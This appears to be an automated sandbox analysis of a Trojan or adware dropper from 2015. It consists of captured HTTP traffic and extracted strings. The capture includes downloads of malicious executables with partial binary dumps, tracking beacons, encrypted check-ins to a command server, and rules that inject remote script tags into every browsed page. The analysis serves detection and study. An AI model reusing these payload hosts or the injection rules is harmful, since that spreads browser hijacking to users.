GET /310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x....u...u...u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u.......u.......u.......u.Rich..u.........................PE..L......T..........................................@.......................................@..................................|..........(........................)..................................xR..@...............L............................text............................... ..`.rdata..............................@..@.data....:...........v..............@....rsrc...(...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................................................j...4...............................t.j.j.j.P....D...P....D.....................3.9.................t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D...P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..................=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.d......E..}....LD......3.3..O.._.f.W..]..O8._4f.W$.w@.E...N.3..^.f.....Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x............................................_l._p.......Gh....._`._d.........
<<< skipped >>>
GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 30 Apr 2015 23:07:04 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ....
GET /v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.97 ms","message":"store 3 action and 5 update "}..0......
GET /v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.25 ms","message":"store 1 action and 0 update "}..0..
GET /services/rules.txt?dummy=328 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:24 GMT
Content-Type: text/plain
Content-Length: 197
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:54 GMT
ETag: "57c94d-c5-514f84ca6d480"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js"></script></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/services/script.js" type="text/javascript"></script>.ncupons|nncupons.
GET /services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
POST /?v=1.03&c=04dec24f&at=620310157&cntr=0 HTTP/1.1
Accept: */*
Host: info.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 152
Cache-Control: no-cache
6l7GU7LYt04pVHc/00d7JpnsyIlcQScF0Zt4fhTcnqAudVVTHAkQvjbNdQcTQVWncSm617pM7dCpzGdczEzIc45kZsS9dv8pqDIWlb4QaSVK72mxtb2fZpL7YThHh9D3L7nkLApli1btouR P4d9XA==
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Length: 960
Connection: keep-alive
DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/TXb0sY3O7zhC8yQbJGORLjeg98mwuB1wGZCDc0Aj/F3Zev9Vec7Xr5Hsf8aSuQ2bbZP dKcxWjvFYPpexl8WtLO4UCI1EVzoWHYDm 1MOVn5taYtzqq13oFvaK7vfUAGfmgYHuaf8nTzRS0IJa3NbpvROTAeUWpTusaRSIQGtT515hc4341dTvNLK6u7VukLbxWVLKHIvMfZxubP/QYujEjiwf21K7 nZaEMEMpGlY6FmD5C63YKyNopqYXsse8r30p4l/F dsOQQRPRKkPGO4y/BookvwEQiDzf1pe2q1nbgrTdPVb/lGdzLChzCkf gIGsN68p2gY7EG49xG4YSAzyhVekJp1DlFbC7i pvbD1XZKMAVJkbtO0PcxgnPmBaC3le7ZevUcf1huI2frYfKNL2h/8nZaenjFhjI26t DtNle9mPkB BhKGXLYoDm 2zRNxP/TAziyXOTC viDy83WtyHCQiBD/jtxSnF5f /GkNFn9wIpc1o6DVebDdHlMmEHTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Thu, 30 Apr 2015 23:07:06 GMT..Content-Length: 960..Connection: keep-alive..DNbcdwG83oyorjbtSlYTH1HSdlfAgwyTnepVoXNiT6jaqu/4vykAfyCEvwNaH 2xXyb85bsm99PmTeo3wq/jrGJIp2SJ8VAcn1FnN1kDbz 9X78YjUOfgugO3NIJwaSyfzDvXZzkR/tFkQxxZqWjj62WXUjbeUqYzkgZZwa9griaFWqreOMMn8P88ri3 K/65j0uF1Q/DBR3Ewlsp4HW PfyGsb0FQJlcllJ2E/7Y6SGNzYmYHtF i/dLKEynEEDqSCqSmv7hGdByYWZdAKhUFVGNRIeyosQOrgGNifNkDwfljb1eY Upvhz0xnUU51fk48mfOCygFPWdVYN6twDeVx3mI18zOz4bCxXVBiLSw/i9yEOo4i2tRaDmV09Rrk/ QhZC Z6j0H1I8qUek8MzVCgqYoDsX/13ysx40E9F0fSD/tbedMvJWTSYkO/T
<<< skipped >>>
HEAD /desprotetor_setup.exe HTTP/1.1
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /desprotetor_setup.exe HTTP/1.1
Range: bytes=0-1117308
Accept: */*
Host: VVV.1strequest.me
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:44 GMT
Content-Type: application/octet-stream
Content-Length: 1117309
Last-Modified: Thu, 30 Apr 2015 03:46:04 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Range: bytes 0-1117308/1117309
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.95 ms","message":"store 4 action and 0 update "}..0..
GET / HTTP/1.1
Host: VVV.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg
Content-Length: 259
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: GFE/2.0
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg">here</A>...</BODY></HTML>..
GET /gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1474
Connection: keep-alive
Set-Cookie: __cfduid=d627dcfacd8ecab9edfc9af1368c6b67f1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 91499122d126a896a1d8c34863d5e7acd6de4b53
Expires: Fri, 01 May 2015 04:15:35 GMT
Last-Modified: Thu, 30 Apr 2015 16:15:35 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edc0de2e046d-FRA
0..........0..... .....0......0...0......,p... ...Gy.....'..B..20150430161535Z0u0s0K0... ........k..vY.d..X.R*.....C....n......>..t]..../Pz...!..5..,.....}*..4....20150430161535Z....20150501041535Z0...*.H...........`y._{V.....x%..v.t.w..[|....T..D>.2...)."..j.7...qpM..&V....4....,K..B.3.....!..v <#....F.J...j(@..o..6.e,...\..?7.......n..~...R...6.../"../&~F...4N4e..y<.<7.yu...{......r~...&....D....B..VW.t4....-.........JI.a.FD...8..A\..li.....^......l.3;..v$n..l.E.M.....0...0...0...........!~.(......gxK.2.T0...*.H........0Q1.0...U....BE1.0...U....GlobalSign nv-sa1'0%..U....GlobalSign CodeSigning CA - G20...150303092326Z..150603082326Z0}1.0...U....BE1.0...U....GlobalSign nv-sa1:08..U...1GlobalSign CodeSigning CA - G2 OCSP responder - 11.0...U....201503031023000.."0...*.H.............0..............E..%p...1.._N.DD..y:\Q...........\.2!PFr...=.C-..dYY........e....yAy...U.HZ3.O....w&Z.:.>.[......>.(..l..t.g3@X&..*i......i.u{...C.....B...........gj......s.!..~..].mS.#.,A @.......b...i.*G....2l.u.....<ISC....F......}0....w2W..KC......6_.........Wua........0..0...U....0.0...U...........0...U.%..0... .......0... .....0......0...U......,p... ...Gy.....'..B0...U.#..0....n......>..t]..../Pz0...*.H.............y..6.-....H.~...H.....L..:G.....p...C..:.... /...5M.^}...5Q.~.....VC...Y.Z(I.k....P. s.!..b..,.A........~..y.G.H....N._......J.........|.k4..../...........('.....)..:..t....-..}e&.*..:*8IH|2s::r..63..Y..G.....#.- ........N....R..X..@. j.,.........N.h........
<<< skipped >>>
GET /v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.dlzip1.istartsurf.finish,5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.....H.....0..
GET /pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar HTTP/1.1
Host: download.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Connection: keep-alive
HTTP/1.1 206 Partial Content
Last-Modified: Wed, 26 Nov 2014 16:59:55 GMT
ETag: "4b1e700-2dc5623-508c5f506dac8"
Server: Apache
X-Backend-Server: ftp3.dmz.scl3.mozilla.com
Content-Type: application/octet-stream
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
X-Cache-Info: cached
Cache-Control: max-age=255584
Expires: Sun, 03 May 2015 22:07:04 GMT
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Range: bytes 900000-1199999/47994403
Content-Length: 300000
Connection: keep-alive
d,.f.\s..H.vB9..b.I`.b..8%..g..m....x..*.....{....?..u;f....._nU._......y q....].~..N...=....c.:..wuz. g...O?....*-..U..,..]u.iE...9..s.gN..5.A.v....;BK..H.....>.J..T.n.#. .......^:...9.giR..h.s..dX[:..D..3...I.`.5..pb.s.-..........P...M.3.,.Z.....t.&Z$nJ."o'.\..O.h.B,Y.......W.........!<.eu.BWsJ.=...Z.l....~..l'...l..9l|....d.x....Fw.B.Gv8....2.XJ.Ed..r...V.J.%.$.~^..N..b.....!..w h-..3.......C[m......R.*/.@.mJg..L.......t.#A....X......D.B.....w.d...$6....8.I....GP..e...o\.UJ.u..yX.I....c..<KG..T......L..mT..,7rA..g..".?....../.&...dI......&.. .k..p.....s..J\..J..p....!.1(...U...A=.......D.....{.H.....v..5!..w.......&.s|......=...V...Ig..Dp..@k..*...o".......Q..r..l]u.u/...(.i......(..j........1.g7..f._N..eVm..~...)%.hX0Zm............z.w...R.".^.hI.Q..nZ@..|....@l4....z...f..ll..._.....(!$....gR..;O.$$#...w.{.k.hB.4.?.....u.$...&}.......Od.. ....".......;[.7@.......n....h$.n.[...B?n......$.\%2........!S...l.(.k...:......c...h.f/...x..VZ..A..R*~....dHh.....9...I.m IW..a1.$u8..o..@........h<...i.v./-.\-......d..~h..H. ..6.M..0....Z.A.T....N..K @....j%....U:.^..z...~.I.....F"..J...`.......1F$...s.D......x$O6....;r.P./.es4.*......n.{g._.U..R?(......|.....B.......m.N....p&.Z......*..ZQ..VR..[..8@".1xy.P..........z.n^.<....^...n3...1...'Ki../...n.A.........cs...0n@Zh.W....B..<.M$..2..|.v.n/6...V........lE/......w8-........-R..\e...WA...756.H.]/d.....-......'......... ..4J@.<.S.4....Fu6%...du.iP.....*>........%/..>#..}....._...c.b.f..!...D%L...../.......,...o&u...#..1...Ex.k.P.. .S.J/......
<<< skipped >>>
GET /services/rules.txt?dummy=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:37 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:37 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.ncupons|nncupons.
GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=900000-1199999
Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1
Connection: keep-alive
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: bouncer2.webapp.scl3.mozilla.com
Cache-Control: max-age=60
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
Keep-Alive: timeout=3, max=499
Content-Length: 0
Connection: Keep-Alive
X-Cache-Info: cached
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=563288, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:40:21 GMT
Expires: Thu, 7 May 2015 11:40:21 GMT
Date: Thu, 30 Apr 2015 23:12:13 GMT
Connection: keep-alive
<<< skipped >>>
GET /install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 30 Apr 2015 23:07:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 668
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<h1>404 Not Found</h1>
<p>The requested URL was not found on this server. Sorry for the inconvenience.<br/>
Please report this message and include the following information to us.<br/>
Thank you very much!</p>
<table>
<tr>
<td>URL:</td>
<td>hXXp://log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F</td>
</tr>
<tr>
<td>Server:</td>
<td>us-pub00.v9.com</td>
</tr>
<tr>
<td>Date:</td>
<td>2015/04/30 18:07:19</td>
</tr>
</table>
<hr/>Powered by Tengine/1.2.2
</body>
</html>
<<< skipped >>>
GET /services/rules.txt?dummy=779 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/plain
Content-Length: 111
Connection: keep-alive
Last-Modified: Thu, 30 Apr 2015 22:05:56 GMT
ETag: "5ac277-6f-514f84cc55900"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:21 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>
ncupons|nncupons
GET /services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=479015, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 12:15:02 GMT
Expires: Wed, 6 May 2015 12:15:02 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
<<< skipped >>>
GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:22 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
<<< skipped >>>
GET /gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/ocsp-response
Content-Length: 1493
Connection: keep-alive
Set-Cookie: __cfduid=d9475cef6091554b34cfafc407203a1381430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.com; HttpOnly
X-Powered-By: Servlet/3.0; JBossAS-6
ETag: 8fc8d7ab1aa7313fa97fcb4c95a3d6ccbfe23096
Expires: Thu, 30 Apr 2015 23:19:16 GMT
Last-Modified: Thu, 30 Apr 2015 11:19:16 GMT
Cache-Control: max-age=180, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 1df6edbd501301b1-FRA
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1512:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
ShowWebInPopUp
pData\Local\Temp\nscD154.tmp\nsWeb.dll
ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe
